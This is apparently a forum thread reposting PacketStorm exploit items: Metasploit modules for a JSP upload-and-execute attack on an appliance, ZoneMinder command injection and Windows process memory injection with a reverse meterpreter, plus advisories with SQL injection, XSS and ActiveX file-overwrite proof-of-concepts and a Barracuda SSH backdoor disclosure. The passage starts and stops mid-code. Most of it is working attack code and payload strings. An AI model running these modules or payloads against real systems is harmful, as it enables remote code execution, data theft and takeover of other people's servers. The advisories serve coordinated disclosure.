#{var_inputstream}.available();\n" jspraw << "byte #{var_bytearray}[] = new byte[#{var_numbytes}];\n" jspraw << "#{var_inputstream}.read(#{var_bytearray});\n" jspraw << "#{var_inputstream}.close();\n" jspraw << "byte[] #{var_bytes} = new byte[#{var_numbytes}/2];\n" jspraw << "for (int #{var_counter} = 0; #{var_counter} < #{var_numbytes}; #{var_counter} += 2)\n" jspraw << "{\n" jspraw << "char #{var_char1} = (char) #{var_bytearray}[#{var_counter}];\n" jspraw << "char #{var_char2} = (char) #{var_bytearray}[#{var_counter} + 1];\n" jspraw << "int #{var_comb} = Character.digit(#{var_char1}, 16) & 0xff;\n" jspraw << "#{var_comb} <<= 4;\n" jspraw << "#{var_comb} += Character.digit(#{var_char2}, 16) & 0xff;\n" jspraw << "#{var_bytes}[#{var_counter}/2] = (byte)#{var_comb};\n" jspraw << "}\n" jspraw << "#{var_outputstream}.write(#{var_bytes});\n" jspraw << "#{var_outputstream}.close();\n" jspraw << "if (System.getProperty(\"os.name\").toLowerCase().indexOf(\"windows\") == -1){\n" jspraw << "String[] #{var_fperm} = new String[3];\n" jspraw << "#{var_fperm}[0] = \"chmod\";\n" jspraw << "#{var_fperm}[1] = \"+x\";\n" jspraw << "#{var_fperm}[2] = #{var_exepath};\n" jspraw << "Process #{var_proc} = Runtime.getRuntime().exec(#{var_fperm});\n" jspraw << "if (#{var_proc}.waitFor() == 0) {\n" jspraw << "#{var_proc} = Runtime.getRuntime().exec(#{var_exepath});\n" jspraw << "}\n" # Linux and other UNICES allow removing files while they are in use... jspraw << "File #{var_fdel} = new File(#{var_exepath}); #{var_fdel}.delete();\n" jspraw << "} else {\n" # Windows does not .. jspraw << "Process #{var_proc} = Runtime.getRuntime().exec(#{var_exepath});\n" jspraw << "}\n" jspraw << "%>\n" return jspraw end def get_install_path res = send_request_cgi( { 'uri' => "#{@uri}appliance/applianceMainPage?skipSessionCheck=1", 'method' => 'POST', 'connection' => 'TE, close', 'headers' => { 'TE' => "deflate,gzip;q=0.3", }, 'vars_post' => { 'num' => '123456', 'action' => 'show_diagnostics', 'task' => 'search', 'item' => 'application_log', 'criteria' => '*.*', 'width' => '500' } }) if res and res.code == 200 and res.body =~ /VALUE="(.*)logs/ return $1 end return nil end def upload_file(location, filename, contents) post_data = Rex::MIME::Message.new post_data.add_part("file_system", nil, nil, "form-data; name=\"action\"") post_data.add_part("uploadFile", nil, nil, "form-data; name=\"task\"") post_data.add_part(location, nil, nil, "form-data; name=\"searchFolder\"") post_data.add_part(contents, "application/octet-stream", nil, "form-data; name=\"uploadFilename\"; filename=\"#{filename}\"") data = post_data.to_s data.gsub!(/\r\n\r\n--_Part/, "\r\n--_Part") res = send_request_cgi( { 'uri' => "#{@uri}appliance/applianceMainPage?skipSessionCheck=1", 'method' => 'POST', 'data' => data, 'ctype' => "multipart/form-data; boundary=#{post_data.bound}", 'headers' => { 'TE' => "deflate,gzip;q=0.3", }, 'connection' => 'TE, close' }) if res and res.code == 200 and res.body.empty? return true else return false end end def check @peer = "#{rhost}:#{rport}" @uri = normalize_uri(target_uri.path) @uri << '/' if @uri[-1,1] != '/' if get_install_path.nil? return Exploit::CheckCode::Safe end return Exploit::CheckCode::Vulnerable end def exploit @peer = "#{rhost}:#{rport}" @uri = normalize_uri(target_uri.path) @uri << '/' if @uri[-1,1] != '/' # Get Tomcat installation path print_status("#{@peer} - Retrieving Tomcat installation path...") install_path = get_install_path if install_path.nil? fail_with(Exploit::Failure::NotVulnerable, "#{@peer} - Unable to retrieve the Tomcat installation path") end print_good("#{@peer} - Tomcat installed on #{install_path}") if target['Platform'] == "linux" @location = "#{install_path}webapps/appliance/" elsif target['Platform'] == "win" @location = "#{install_path}webapps\\appliance\\" end # Upload the JSP and the raw payload @jsp_name = rand_text_alphanumeric(8+rand(8)) jspraw = generate_jsp # Specify the payload in hex as an extra file.. payload_hex = payload.encoded_exe.unpack('H*')[0] print_status("#{@peer} - Uploading the payload") if upload_file(@location, "#{@var_hexfile}.txt", payload_hex) print_good("#{@peer} - Payload successfully uploaded to #{@location}#{@var_hexfile}.txt") else fail_with(Exploit::Failure::NotVulnerable, "#{@peer} - Error uploading the Payload") end print_status("#{@peer} - Uploading the payload") if upload_file(@location, "#{@jsp_name}.jsp", jspraw) print_good("#{@peer} - JSP successfully uploaded to #{@location}#{@jsp_name}.jsp") else fail_with(Exploit::Failure::NotVulnerable, "#{@peer} - Error uploading the jsp") end print_status("Triggering payload at '#{@uri}#{@jsp_name}.jsp' ...") res = send_request_cgi( { 'uri' => "#{@uri}appliance/#{@jsp_name}.jsp", 'method' => 'GET' }) if res and res.code != 200 print_warning("#{@peer} - Error triggering the payload") end register_files_for_cleanup("#{@location}#{@var_hexfile}.txt") register_files_for_cleanup("#{@location}#{@jsp_name}.jsp") end end Source: PacketStorm
  19. Praetorian503
    This Metasploit module exploits a command execution vulnerability in ZoneMinder Video Server version 1.24.0 to 1.25.0 which could be abused to allow authenticated users to execute arbitrary commands under the context of the web server user. The 'packageControl' function in the 'includes/actions.php' file calls 'exec()' with user controlled data from the 'runState' parameter. ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient def initialize(info={}) super(update_info(info, 'Name' => 'ZoneMinder Video Server packageControl Command Execution', 'Description' => %q{ This module exploits a command execution vulnerability in ZoneMinder Video Server version 1.24.0 to 1.25.0 which could be abused to allow authenticated users to execute arbitrary commands under the context of the web server user. The 'packageControl' function in the 'includes/actions.php' file calls 'exec()' with user controlled data from the 'runState' parameter. }, 'References' => [ ['URL', 'http://itsecuritysolutions.org/2013-01-22-ZoneMinder-Video-Server-arbitrary-command-execution-vulnerability/'], ], 'Author' => [ 'Brendan Coles <bcoles[at]gmail.com>', # Discovery and exploit ], 'License' => MSF_LICENSE, 'Privileged' => true, 'Arch' => ARCH_CMD, 'Platform' => 'unix', 'Payload' => { 'BadChars' => "\x00", 'Compat' => { 'PayloadType' => 'cmd', 'RequiredCmd' => 'generic telnet python perl bash', }, }, 'Targets' => [ ['Automatic Targeting', { 'auto' => true }] ], 'DefaultTarget' => 0, 'DisclosureDate' => "Jan 22 2013", )) register_options([ OptString.new('USERNAME', [true, 'The ZoneMinder username', 'admin']), OptString.new('PASSWORD', [true, 'The ZoneMinder password', 'admin']), OptString.new('TARGETURI', [true, 'The path to the web application', '/zm/']) ], self.class) end def check peer = "#{rhost}:#{rport}" base = target_uri.path base << '/' if base[-1, 1] != '/' user = datastore['USERNAME'] pass = datastore['PASSWORD'] cookie = "ZMSESSID=" + rand_text_alphanumeric(rand(10)+6) data = "action=login&view=version&username=#{user}&password=#{pass}" # login and retrieve software version print_status("#{peer} - Authenticating as user '#{user}'") begin res = send_request_cgi({ 'method' => 'POST', 'uri' => "#{base}index.php", 'cookie' => "#{cookie}", 'data' => "#{data}", }) if res and res.code == 200 if res.body =~ /<title>ZM - Login<\/title>/ print_error("#{peer} - Authentication failed") return Exploit::CheckCode::Unknown elsif res.body =~ /v1.2(4\.\d+|5\.0)/ return Exploit::CheckCode::Appears elsif res.body =~ /<title>ZM/ return Exploit::CheckCode::Detected end end return Exploit::CheckCode::Safe rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeoutp print_error("#{peer} - Connection failed") end return Exploit::CheckCode::Unknown end def exploit @peer = "#{rhost}:#{rport}" base = target_uri.path base << '/' if base[-1, 1] != '/' cookie = "ZMSESSID=" + rand_text_alphanumeric(rand(10)+6) user = datastore['USERNAME'] pass = datastore['PASSWORD'] data = "action=login&view=postlogin&username=#{user}&password=#{pass}" command = Rex::Text.uri_encode(payload.encoded) # login print_status("#{@peer} - Authenticating as user '#{user}'") begin res = send_request_cgi({ 'method' => 'POST', 'uri' => "#{base}index.php", 'cookie' => "#{cookie}", 'data' => "#{data}", }) if !res or res.code != 200 or res.body =~ /<title>ZM - Login<\/title>/ fail_with(Exploit::Failure::NoAccess, "#{@peer} - Authentication failed") end rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout fail_with(Exploit::Failure::Unreachable, "#{@peer} - Connection failed") end print_good("#{@peer} - Authenticated successfully") # send payload print_status("#{@peer} - Sending payload (#{command.length} bytes)") begin res = send_request_cgi({ 'method' => 'POST', 'uri' => "#{base}index.php", 'data' => "view=none&action=state&runState=start;#{command}%26", 'cookie' => "#{cookie}" }) if res and res.code == 200 print_good("#{@peer} - Payload sent successfully") else fail_with(Exploit::Failure::UnexpectedReply, "#{@peer} - Sending payload failed") end rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout fail_with(Exploit::Failure::Unreachable, "#{@peer} - Connection failed") end end end Source: PacketStorm
  20. Praetorian503
    ImageCMS version 4.0.0b suffers from a remote SQL injection vulnerability. Advisory ID: HTB23132 Product: ImageCMS Vendor: www.imagecms.net Vulnerable Version(s): 4.0.0b and probably prior Tested Version: 4.0.0b Vendor Notification: December 5, 2012 Vendor Patch: January 16, 2013 Public Disclosure: January 23, 2013 Vulnerability Type: SQL Injection [CWE-89] CVE Reference: CVE-2012-6290 Risk Level: Medium CVSSv2 Base Score: 6.5 (AV:N/AC:L/Au:S/C:P/I:P/A:P) Solution Status: Fixed by Vendor Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) ----------------------------------------------------------------------------------------------- Advisory Details: High-Tech Bridge Security Research Lab discovered vulnerability in ImageCMS, which can be exploited to perform SQL injection attacks. 1) SQL injection vulnerability in ImageCMS: CVE-2012-6290 The vulnerability exists due to insufficient filtration of the "q" HTTP GET parameter passed to "/admin/admin_search/". A remote authenticated administrator can execute arbitrary SQL commands in the application's database. Depending on the database and system configuration PoC (Proof-of-Concept) code below will create "/tmp/file.txt" file with MySQL server version inside: http://[host]/admin/admin_search?q=123%27%20UNION%20SELECT%201,2,version%28%29,4,5,6,7,8,9,10,11,1 2,13,14,15%20INTO%20OUTFILE%27/tmp/file.txt%27%20--%202 This vulnerability can also be exploited by remote non-authenticated attacker via CSRF vector because the application is prone to Cross-Site Request Forgery attack. In order to do so attacker should trick a logged-in administrator to visit a web page with CSRF exploit. Basic CSRF exploit example: <img src="http://[host]/admin/admin_search?q=123%27%20UNION%20SELECT%201,2,version%28%29,4,5,6,7,8,9,10,11,1 2,13,14,15%20INTO%20OUTFILE%27/tmp/file.txt%27%20--%202"> ----------------------------------------------------------------------------------------------- Solution: Upgrade to ImageCMS 4.2 More Information: http://forum.imagecms.net/viewtopic.php?id=1436 http://www.imagecms.net/blog/news/reliz-imagecms-42-razgranichenie-prav-dostupa-i-drugie-novinki ----------------------------------------------------------------------------------------------- References: [1] High-Tech Bridge Advisory HTB23132 - https://www.htbridge.com/advisory/HTB23132 - SQL Injection Vulnerability in ImageCMS. [2] ImageCMS - http://www.imagecms.net - A free modern Web 3.0 content management system. [3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures. [4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types. ----------------------------------------------------------------------------------------------- Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References. Source: PacketStorm
  21. Praetorian503
    gpEasy versions 3.5.2 and below suffer from a cross site scripting vulnerability. Advisory ID: HTB23137 Product: gpEasy Vendor: gpeasy Vulnerable Version(s): 3.5.2 and probably prior Tested Version: 3.5.2 Vendor Notification: January 2, 2013 Vendor Patch: January 2, 2013 Public Disclosure: January 23, 2013 Vulnerability Type: Cross-Site Scripting [CWE-79] CVE Reference: CVE-2013-0807 Risk Level: Low CVSSv2 Base Score: 2.6 (AV:N/AC:H/Au:N/C:N/I:P/A:N) Solution Status: Fixed by Vendor Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) ----------------------------------------------------------------------------------------------- Advisory Details: High-Tech Bridge Security Research Lab discovered vulnerability in gpEasy, which can be exploited to perform Cross-Site Scripting (XSS) attacks. 1) Cross-Site Scripting (XSS) in gpEasy: CVE-2013-0807 The vulnerability exists due to insufficient sanitisation of user-supplied data in "section" HTTP GET parameter passed to "index.php" script. A remote attacker can trick logged-in administrator to open a specially crafted link and execute arbitrary HTML and script code in browser in context of the vulnerable website. The exploitation example below uses the "alert()" JavaScript function to display administrator's cookies: http://[host]/?cmd=new_section&section=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E ----------------------------------------------------------------------------------------------- Solution: Upgrade "include/tool/editing_page.php" script to the latest version from GitHub. More Information: https://github.com/oyejorge/gpEasy-CMS/commit/40f1b4a5749a621cd27c5ca39900dbcf8701969d ----------------------------------------------------------------------------------------------- References: [1] High-Tech Bridge Advisory HTB23137 - https://www.htbridge.com/advisory/HTB23137 - Cross-Site Scripting (XSS) vulnerability in gpEasy. [2] gpEasy - http://gpeasy.com - gpEasy is a complete and easy to use Content Management System written in PHP. [3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures. [4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types. ----------------------------------------------------------------------------------------------- Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References. Source: PacketStorm
  22. Praetorian503
    Aloaha PDF Crypter version 3.5.0.1164 suffers from an active-x arbitrary file overwrite vulnerability. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 ============================================================================================ TITLE: ============================================================================================ Aloaha PDF Crypter (3.5.0.1164) activex arbitrary file overwrite url: http://www.aloaha.com/ download: http://www.aloaha.com/download/aloaha_crypter.zip author: shinnai (http://shinnai.altervista.org) ============================================================================================ FILE INFO: ============================================================================================ File: C:\WINDOWS\system32\vbCrypt.dll InternalName: ebCrypt OriginalFilename: ebCrypt.DLL FileVersion: 2.0.0.2087 FileDescription: ebCrypt Main Module Product: ebCrypt ProductVersion: 2.0.0.2087 Language: English (United States) MD5 hash: b262cb93c555c3c9604502d071a783ec ============================================================================================ ACTIVEX INFO: ============================================================================================ ProgID: EbCrypt.eb_c_PRNGenerator.1 GUID: {B1E7505E-BBFD-42BF-98C9-602205A1504C} Description: eb_c_PRNGenerator Class Safety report: RegKey Safe for Script: False RegKey Safe for Init: False Implements IObjectSafety: True IDisp Safe: Safe for untrusted: caller,data ============================================================================================ BUG: ============================================================================================ This activex contains the "SaveToFile" which could be used to overwite arbitrary files on pc users. ============================================================================================ PROOF OF CONCEPT ============================================================================================ <html> <object classid='clsid:B1E7505E-BBFD-42BF-98C9-602205A1504C' id='test' ></object> <script language='vbscript'> test.SaveToFile "c:\windows\_system.ini" </script> </html> ============================================================================================ -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.13 (MingW32) iQIcBAEBAgAGBQJQ/6sFAAoJEJlK/ai8vywmSUUQAK38iSzcZ3JsD+Kskt1Zwvhc hynADNu17uvlcaUoK7uFc8BwOkRT6XqlmJe6Gab02jPClkmaHRH0Oh8/Zxu8T5Y5 TsLrw7YgUFQDelS4zL7yxZIKofio3GVS55vo3JL1bJvKrANp99BYcQFX4t5539g9 l/kYf51QGhWXxEvYFlSpDZ8km8dCElLYTT47oFjXMFSpBHyodrU4MPh4FGLoN1XN TLrYDOoTke+RXit/nzNKqbNzXIXmBVTBWfYdPLWwcc07Go4KR3tKGl1ELSCczHeg PFWCbcJ18l56809afAviUUvrgb1g9WG9ZY5jMxXP1t5oqeeLJKfKhX0KipVtoBUa dZZWJOLp6Mmi8VBzfkTu50jZy1B4EtUSTlmj5A2SKBQRM/0SSqZO1LjwE39fQ9gh 6avUHhPgV9OLqaWxVbNHy6RYBFYHlo46ytvIhgBDU0VPqwI50yyzrObxbRAhCD19 GjgSBtZqOJQ9sFwiXS+HHQcCt8ZR6pf09yWmxDr+1L7D4yKvq/Z2TsBuYKMUGazW Xni6lxddI7LUN88LXlrV8cCoJ7R2gBe9Tg3nUBIDLpXM4hyeU1DTL0kFNATUk3P5 7xFde64BvKL2GAzEip8j9PuGhezfflIIhsxPHUEemOvsUctqXEQI8DtC0GkRaT3J enDko6b3T5jOt6axrWGb =H+Gh -----END PGP SIGNATURE----- Source: PacketStorm
  23. Praetorian503
    Multiple Barracuda Networks products suffer from having static backdoor accounts that allow for remote administrative access via SSH. SEC Consult Vulnerability Lab Security Advisory < 20130124-0 > ======================================================================= title: Critical SSH Backdoor in multiple Barracuda Networks Products vulnerable products: Barracuda Spam and Virus Firewall Barracuda Web Filter Barracuda Message Archiver Barracuda Web Application Firewall Barracuda Link Balancer Barracuda Load Balancer Barracuda SSL VPN (all including their respective virtual "Vx" versions) vulnerable version: all versions < Security Definition 2.0.5 fixed version: Security Definition 2.0.5 impact: Critical homepage: https://www.barracudanetworks.com/ found: 2012-11-20 by: S. Viehböck SEC Consult Vulnerability Lab https://www.sec-consult.com ======================================================================= Vendor/product description: ----------------------------- URL: https://www.barracudanetworks.com/products/ Vulnerability overview/description: ----------------------------------- 1) Backdoor accounts Several undocumented operating system user accounts exist on the appliance. They can be used to gain access to the appliance via the terminal but also via SSH. (see 2) These accounts are undocumented and can _not_ be disabled! 2) Remote access via SSH An SSH daemon runs on the appliance, but network filtering (iptables) is used to only allow access from whitelisted IP ranges (private and public). The public ranges include servers run by Barracuda Networks Inc. but also servers from other, unaffiliated entities - all of whom can access SSH on all affected Barracuda Networks appliances exposed to the Internet. The backdoor accounts from 1) can be used to gain shell access. This functionality is entirely undocumented and can only be disabled via a hidden 'expert options' dialog (see Workaround). Proof of concept: ----------------- URLs and other exploit code (passwords) have been removed from this advisory. A detailed advisory will be released within a month including the omitted information. 1) Backdoor accounts The passwd and shadow file show that the following accounts exist. Some passwords could be recovered (short attack with tiny wordlist): root:x:0:0:root:/root:/bin/bash <-- UID: 0! <hash removed> NOT CRACKED during given time (confirmed static in tested appliances) build:x:0:0:Build User:/root:/boot/os_tools/clone_interactive.pl <-- UID: 0! <hash removed> NOT CRACKED during given time shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown -h now <hash removed> CRACKED <password removed> product:x:700:100::/home/product:/bin/bash <hash removed> CRACKED <password removed> ca:x:704:65534:ACL reset user:/home/ca:/home/emailswitch/code/firmware/current/bin/clear_acls.sh <hash removed> CRACKED <password removed> support:x:705:705::/home/support:/home/product/code/firmware/current/bin/request_support.pl <hash removed> CRACKED <password removed> websupport:x:706:706::/home/websupport:/home/emailswitch/code/firmware/current/bin/request_web.pl <hash removed> CRACKED <password removed> qa_test:x:707:707::/home/qa_test:/root/qa_test1.pl <hash removed> NOT CRACKED during given time The following users have public keys added to their authorized_keys file: remote:x:0:0:Remote Access:/home/remote:/bin/bash <-- UID: 0! # cat /home/remote/.ssh/authorized_keys2 ssh-dss AAAAB3NzaC1kc3MAAACBAM3angjOeIjCePKw8a/zTugPKK+hoYkpQhyXY8+BN q14nCInlcrzhavCiQCVKNTVtpW0A2hs75/QGslwrTpulsX89ZQL0Wx915iNbaf0P5sXoU rA0iPoPoL3nIXWskjc6xj+x66svIVHxiBYpnTSaBNaJhxU5/3eK+/3sSPrAR0NAAAAFQD u09YU0d2eG63v+zHmSIKCMZ8vnwAAAIAPaB34rhWjIRE5hz6YxU8jeEnPZPr3ZX8hbshk asrrcQG+L0UeTGKoL7JTYQ2vu/549xXBpheiTAKunYES6RwURziz11vq6oWix3Wo6GGOb yS53MIbyyc4DrB4zLDUI4PJFLBxwKTOBOSU7OuCH7sQ6rzaMrsDZIf6GxeTrDIN1gAAAI AlkA1hEFFmRh7SfOkN4oGFcvZl/71PTEXnK3HZZopYW5WIqueTl6NALiq6FobY+U8b/NQ ibvXXEinLP6dgqd/xnYYhwoUMuP5GPDhUkl+xKoBjAd+33yT4AN1ymWx/LZZ+9uQXt08k Q3sgpXBhW6YT+rqrJLgc9l3Y2/exVGJjYA== manager@support01.barracudanetwo rks.com cluster:x:1000:1000::/home/cluster:/bin/bash # cat /home/cluster/.ssh/authorized_keys2 ssh-dss AAAAB3NzaC1kc3MAAACBAJ5O8UhVP3lb0Mff66uHMkvcZlxPJF/7pgtcq5Qd/ 7cuwqv65/BiDU2oNOWAIfaO89K+kLvrt+VY3TdemTrcRGiTZfzXeRASB9wWVI7rPPsIYs S47lBEp7PYJANWXd6rYgfTw3fr1PYHpUBDgxOcHshmL469lDDbx6CodrwgK4e/AAAAFQD a/pjlqnKmBtWNqBXB89J3qhb06QAAAIAiQCodsX5QqA8TBP6scOYIckkHiUbIireamxVa U587P7uthFiMVnKrj9MTzwgFebTQQ02B9LQpXfmMdQdZi2Hb8FCwP1cuxp0yAHKqYh3ss hCzhDq2lrw1NrAVlrkp4dqj0lvwEUp3BYf9VnveylrfiHA45hyXdXdzfxdn7/CDQQAAAI AOtKcLIsZ30Y4HG0Qk4cYqKw8QryvS36xbvywX7Tq8/7N5D0LrjaCzBYo8cBIBxHjpePT D7pOSgUiuXk16y8ffTYzLexSqL0wFLV5GIIxAeXhtCtIUPVXRZzTm97NiErikbfjDRx0P PZKcOH8A1LX4Y0nLoBbnNnPvhcIXfElkow== At least the user "product" can be used to login and get a shell on the appliance. It was confirmed that this user can access the MySQL database (root@localhost with no password) eg. to add new users with administrative privileges to the appliance configuration. Furthermore it was possible to enable diagnostic/debugging functionality which could be used to gain root access on the system. (confirmed in Barracuda SSL VPN) 2) Remote access via SSH An /etc/sysconfig/iptables file shows which rules are in place: # Generated by iptables-save v1.2.7a on Thu Oct 9 16:39:19 2003 *nat :PREROUTING ACCEPT [4012:488438] :POSTROUTING ACCEPT [641:40599] :OUTPUT ACCEPT [641:40599] COMMIT # Completed on Thu Oct 9 16:39:19 2003 # Generated by iptables-save v1.2.7a on Thu Oct 9 16:39:19 2003 *filter :INPUT ACCEPT [42408:13197223] :FORWARD ACCEPT [0:0] :OUTPUT ACCEPT [49685:7341128] -A INPUT -s localhost -p tcp -m tcp --dport 22 -j ACCEPT -A INPUT -s 192.168.200.0/255.255.255.0 -p tcp -m tcp --dport 22 -j ACCEPT -A INPUT -s 192.168.200.0/255.255.255.0 -p tcp -m tcp --dport 22 --tcp-flags SYN,RST,ACK SYN -j ACCEPT -A INPUT -s 192.168.10.0/255.255.255.0 -p tcp -m tcp --dport 22 -j ACCEPT -A INPUT -s 192.168.10.0/255.255.255.0 -p tcp -m tcp --dport 22 --tcp-flags SYN,RST,ACK SYN -j ACCEPT -A INPUT -s 205.158.110.0/255.255.255.0 -p tcp -m tcp --dport 22 -j ACCEPT -A INPUT -s 205.158.110.0/255.255.255.0 -p tcp -m tcp --dport 22 --tcp-flags SYN,RST,ACK SYN -j ACCEPT -A INPUT -s 216.129.105.0/255.255.255.0 -p tcp -m tcp --dport 22 -j ACCEPT -A INPUT -s 216.129.105.0/255.255.255.0 -p tcp -m tcp --dport 22 --tcp-flags SYN,RST,ACK SYN -j ACCEPT -A INPUT -p tcp -m tcp --dport 22 -j REJECT --reject-with icmp-port-unreachable COMMIT # Completed on Thu Oct 9 16:39:19 2003 Note: The timestamp and the version of iptables-save suggest that these rules might have been in place on Barracuda Networks appliances since 2003. Users from these networks can access the SSH daemon running (by default on the tested appliances) on port 22 e.g. by using the backdoor accounts: * Private IP ranges 192.168.200.0/24 192.168.10.0/24 In some situations a user might be able to set his IP address (in the local network) to one within the private ranges and then be allowed to access SSH. * Public IP ranges 205.158.110.0/24 216.129.105.0/24 These ranges include some servers run by Barracuda Networks eg. spam04.barracuda.com (216.129.105.22) forum.barracudanetworks.com (216.129.105.38) barracudacentral.org (216.129.105.40) repsrv.barracuda.com (216.129.105.42) mirror01.barracudacentral.com (216.129.105.94) ... but also servers from other entities: mail.totalpaas.com (205.158.110.135) - Domain registered by: Domains By Proxy, LLC ... frmt1.boxitweb.com (205.158.110.132) - Domain registered by: Thor Myhrstad static.medallia.com (205.158.110.229) - Domain registed by: Medallia Inc. utility.connectify.net (205.158.110.171) - Domain registered by: Connectify Networks, Inc. everest.address.com (216.129.105.202) - Domain registed by: WhitePages, Inc. mail.tqm.bz (216.129.105.205) - Domain registered by: Total Quality Maintenance, Inc outbound.andyforbes.com (216.129.105.212) - Domain registered by: HM hosting ... More information about the hosts in these /24 networks can be found at: http://cnet.robtex.com/205.158.110.html http://cnet.robtex.com/216.129.105.html A breach of any server in the whitelisted ranges enables an attack against all affected Barracuda Networks appliances on the web. Note: The credentials from 1) (eg. "product" user) can be used to get a shell on a appliance. Vulnerable / tested versions: ----------------------------- The vulnerability has been verified to exist in Barracuda SSL VPN version 2.2.2.203, which was the most recent version at the time of discovery. Barracuda Networks confirmed that _all_ of their appliances with the exception of the Barracuda Backup Server, Barracuda Firewall, and Barracuda NG Firewall are affected as well in _all_ available versions. Vendor contact timeline: ------------------------ 2012-11-29: Contacting vendor. 2012-11-29: Sending advisory and proof of concept exploit via encrypted channel. 2012-12-04: Vendor confirms receipt and provides BNSEC IDs. 2012-12-05: Requesting further coordination (conference call). 2012-12-13: Sending reminder regarding SEC Consult disclosure policy. 2012-12-15: Vendor responds - arranging conference call. 2012-12-18: Conference call: Addressing the risks the discovered vulnerabilities pose to customers and release schedule. 2013-01-14: Vendor sends listing of reported vulnerabilities and release schedule. 2013-01-21: Conference call - discussing implemented solutions. 2013-01-21: Vendor provides information about some questions which came up. 2013-01-22: Asking for definitive listing of affected appliances. 2013-01-23: Barracuda Networks releases alert & secdef 2013-01-24: SEC Consult releases coordinated security advisory. Solution: --------- Update to Security Definition 2.0.5. This will change the sshd config to only allow logins from the following users: * cluster (login with pubic/private key) * remote (login with pubic/private key, Barracuda Networks is in possession of the corresponding private key) * root (login with password, password hash (listed above) might be crackable depending on password strength) According to Barracuda Networks these accounts are essential for customer support and will not be removed. The vulnerability described in 2) is _not_ handled by this patch. This still leaves considerable risks to appliances as the password for the 'root' user might be crackable and the relevant private keys for the 'remote' user might be stolen from Barracuda Networks. In secure environments it is highly undesirable to use appliances with backdoors built into them. Even if only the manufacturer can access them. Workaround: ----------- Place the appliances behind a firewall and block any incoming traffic (local and Internet) to port 22. Barracuda Networks offers an expert option that disables the SSH daemon. For assistance contact the Barracuda Networks Support. Advisory URL: -------------- https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ SEC Consult Unternehmensberatung GmbH Office Vienna Mooslackengasse 17 A-1190 Vienna Austria Tel.: +43 / 1 / 890 30 43 - 0 Fax.: +43 / 1 / 890 30 43 - 25 Mail: research at sec-consult dot com www.sec-consult.com EOF S. Viehböck / @2013 Source: PacketStorm
  24. Praetorian503
    This Metasploit module will inject a payload into memory of a process. If a payload isn't selected, then it'll default to a reverse x86 TCP meterpreter. If the PID datastore option isn't specified, then it'll inject into notepad.exe instead. ## # ## This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # web site for more information on licensing and terms of use. # http://metasploit.com/ ## require 'msf/core' require 'rex' require 'msf/core/exploit/exe' class Metasploit3 < Msf::Exploit::Local Rank = ExcellentRanking def initialize(info={}) super( update_info( info, 'Name' => 'Windows Manage Memory Payload Injection', 'Description' => %q{ This module will inject a payload into memory of a process. If a payload isn't selected, then it'll default to a reverse x86 TCP meterpreter. If the PID datastore option isn't specified, then it'll inject into notepad.exe instead. }, 'License' => MSF_LICENSE, 'Author' => [ 'Carlos Perez <carlos_perez[at]darkoperator.com>', 'sinn3r' ], 'Platform' => [ 'win' ], 'SessionTypes' => [ 'meterpreter' ], 'Targets' => [ [ 'Windows', {} ] ], 'DefaultTarget' => 0, 'DisclosureDate'=> "Oct 12 2011" )) register_options( [ OptInt.new('PID', [false, 'Process Identifier to inject of process to inject payload.']), OptBool.new('NEWPROCESS', [false, 'New notepad.exe to inject to', false]) ], self.class) end # Run Method for when run command is issued def exploit @payload_name = datastore['PAYLOAD'] @payload_arch = framework.payloads.create(@payload_name).arch # syinfo is only on meterpreter sessions print_status("Running module against #{sysinfo['Computer']}") if not sysinfo.nil? pid = get_pid if not pid print_error("Unable to get a proper PID") return end if @payload_arch.first =~ /64/ and client.platform =~ /x86/ print_error("You are trying to inject to a x64 process from a x86 version of Meterpreter.") print_error("Migrate to an x64 process and try again.") return false else inject_into_pid(pid) end end # Figures out which PID to inject to def get_pid pid = datastore['PID'] if pid == 0 or datastore['NEWPROCESS'] or not has_pid?(pid) print_status("Launching notepad.exe...") pid = create_temp_proc end return pid end # Determines if a PID actually exists def has_pid?(pid) procs = [] begin procs = client.sys.process.processes rescue Rex::Post::Meterpreter::RequestError print_error("Unable to enumerate processes") return false end pids = [] procs.each do |p| found_pid = p['pid'] return true if found_pid == pid end print_error("PID #{pid.to_s} does not actually exist.") return false end # Checks the Architeture of a Payload and PID are compatible # Returns true if they are false if they are not def arch_check(pid) # get the pid arch client.sys.process.processes.each do |p| # Check Payload Arch if pid == p["pid"] vprint_status("Process found checking Architecture") if @payload_arch.first == p['arch'] vprint_good("Process is the same architecture as the payload") return true else print_error("The PID #{ p['arch']} and Payload #{@payload_arch.first} architectures are different.") return false end end end end # Creates a temp notepad.exe to inject payload in to given the payload # Returns process PID def create_temp_proc() windir = client.fs.file.expand_path("%windir%") # Select path of executable to run depending the architecture if @payload_arch.first== "x86" and client.platform 